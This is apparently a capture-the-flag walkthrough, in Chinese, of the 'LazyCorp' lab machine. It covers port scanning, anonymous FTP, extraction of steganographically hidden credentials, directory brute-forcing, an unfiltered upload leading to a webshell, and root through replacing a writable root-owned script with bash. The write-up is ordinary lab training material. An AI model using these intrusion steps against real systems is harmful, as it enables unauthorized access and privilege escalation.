Nmap #
[root@Hacking] /home/kali/lazycorp
❯ nmap 192.168.55.152 -A -p-
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.5
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.55.4
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.5 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 114 119 4096 Jul 16 12:35 pub
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 46:82:43:4b:ef:e0:b0:50:04:c0:d5:2c:3c:5c:7d:4a (RSA)
| 256 52:79:ea:92:35:b4:f2:5d:b9:14:f0:21:1c:eb:2f:66 (ECDSA)
|_ 256 98:fa:95:86:04:75:31:39:c6:60:26:9e:26:86:82:88 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: LazyCorp | Empowering Devs
| http-robots.txt: 2 disallowed entries
|_/cms-admin.php /auth-LazyCorp-dev/
|_http-server-header: Apache/2.4.41 (Ubuntu)
发现FTP可以匿名访问
Stegseek #
[root@Hacking] /home/kali/lazycorp
❯ ftp 192.168.55.152
Connected to 192.168.55.152.
220 (vsFTPd 3.0.5)
Name (192.168.55.152:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||11020|)
150 Here comes the directory listing.
drwxr-xr-x 2 114 119 4096 Jul 16 12:35 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||44460|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 1366786 Jul 16 12:35 note.jpg
226 Directory send OK.
ftp> get note.jpg
local: note.jpg remote: note.jpg
229 Entering Extended Passive Mode (|||34814|)
150 Opening BINARY mode data connection for note.jpg (1366786 bytes).
100% |***************************************************************************************************| 1334 KiB 183.63 MiB/s 00:00 ETA
226 Transfer complete.
1366786 bytes received in 00:00 (53.00 MiB/s)
ftp>
找到一张图片,并且里面有一个用户凭证
[root@Hacking] /home/kali/lazycorp
❯ stegseek note.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: ""
[i] Original filename: "creds.txt".
[i] Extracting to "note.jpg.out".
[root@Hacking] /home/kali/lazycorp
❯ cat note.jpg.out
Username: dev
Password: d3v3l0pm3nt!nt3rn
Dir scan #
[root@Hacking] /home/kali/lazycorp
❯ dirsearch -u http://192.168.55.152
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289
Target: http://192.168.55.152/
[16:02:37] Scanning:
[16:02:38] 403 - 279B - /.php
[16:02:42] 301 - 315B - /blog -> http://192.168.55.152/blog/
[16:02:42] 403 - 279B - /blog/
[16:02:45] 200 - 582B - /index.html
[16:02:48] 200 - 55B - /robots.txt
[16:02:48] 403 - 279B - /server-status
[16:02:48] 403 - 279B - /server-status/
[16:02:49] 301 - 318B - /uploads -> http://192.168.55.152/uploads/
[16:02:49] 403 - 279B - /uploads/
Task Completed
进入到/blog目录,有几个留言在注释里可以注意一下
/blog/blog.php
<!-- Arvind: He used note.jpg again. Let's see how long it lasts this time. -->
/blog/blog1.php
<!-- Hidden Hint: Sometimes the simplest transfer method—one that preserves every byte—protects the hidden secrets best. -->
/blog/blog2.php
<!-- Arvind: Reset script was never meant to be writeable by anyone... yet here we are. -->
/blog/blog3.php
<!-- Arvind: bro you forgot to disable that old login -->
然后来到最后一个留言有一个链接,只不过点进去都是Access Denied,并且没有特殊参数可以影响
[root@Hacking] /home/kali/lazycorp
❯ feroxbuster -u http://192.168.55.152/auth-lazycorp-dev/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.55.152/auth-lazycorp-dev/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 31w 276c http://192.168.55.152/auth-lazycorp-dev/auth-LazyCorp-dev
404 GET 9l 31w 276c http://192.168.55.152/auth-lazycorp-dev/cms-admin.php
404 GET 9l 31w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 28w 279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 9l 28w 336c http://192.168.55.152/auth-lazycorp-dev/uploads => http://192.168.55.152/auth-lazycorp-dev/uploads/
200 GET 21l 53w 710c http://192.168.55.152/auth-lazycorp-dev/login.php
200 GET 0l 0w 0c http://192.168.55.152/auth-lazycorp-dev/uploads/shell.php
302 GET 0l 0w 0c http://192.168.55.152/auth-lazycorp-dev/dashboard.php => login.php
Upload #
使用之前的用户名和密码即可登录,并且是无任何过滤,文件最后会被上传到/auth-lazycorp-dev/uploads/
Root #
发现家目录里有个SUID的文件
arvind@arvindlazycorp:~$ ls -al /usr/bin/reset_site.sh
-rwxrwxr-x 1 root arvind 1183448 Aug 19 07:58 /usr/bin/reset_site.sh
arvind@arvindlazycorp:~$ id
uid=1000(arvind) gid=1000(arvind) groups=1000(arvind),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),117(lxd)
因此,只需要把reset_site.sh替换为bash即可
